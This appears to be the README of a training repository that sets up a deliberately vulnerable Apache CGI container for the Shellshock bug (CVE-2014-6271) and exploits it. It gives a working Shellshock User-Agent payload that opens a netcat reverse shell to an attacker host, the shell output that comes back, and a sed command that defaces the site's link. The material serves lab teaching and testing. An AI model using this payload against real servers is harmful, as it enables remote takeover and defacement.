This Repo is PoC environment of CVE-2014-6271.
You can deploy web service including vulernability using apache2 container image.
Build insecure image from Dockerfile.
# docker build -t cve-2014-6271-apache-debian:buster ./insecure-base-image/
# docker build -t training-website-poc:v1.0 ./web-insecure/
Deploy PoC container as a docker container.
# docker run -d -p 8080:80 training-website-poc:v1.0
Deploy PoC container as a k8s pod and service.
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-pod.yml
# kubectl apply -f web-insecure/k8s-manifest/web-insecure-svc.yml
After the deployment is completed, you can browse the web page by accessing the following URL with a browser.
You can access the k8s lab environment by clicking the link "Click!" under the web page.
http://<docker host IP>:8080
http://<k8s service endpoint>:<k8s service port>
In this demo, you can change the web page from Attacker Host (outside of container) exploiting vulernability of CVE-2014-6271
Exec these commands from attacker host.
Terminal 1
# nc -nvlp 5050
Terminal 2
※In this case, we deploy PoC container using Docker. In case of Kubernetes, the URL should be http://<k8s service endpoint>:<k8s service port>
# curl -H "user-agent: () { :; }; echo; /bin/nc -e /bin/bash <Attacker Host IP> 5050" http://<docker host IP>:8080/cgi-bin/vulnerable
After that, you can see that the /bin/bash
of the PoC container can be executed in the terminal 1.
Listening on 5050
Connection received on 38926
uid=33(www-data) gid=33(www-data) groups=33(www-data),1000(wheel)
Change the link "Click!" of web page.
In this case, we use dummy page for malicious link.
sudo sed -i -e 's/https\:\/\/\/courses\/kubernetes/danger.html/' /var/www/html/index.html
Access the web page again and clicking the link "Click!" under the web page.
http://<docker host IP>:8080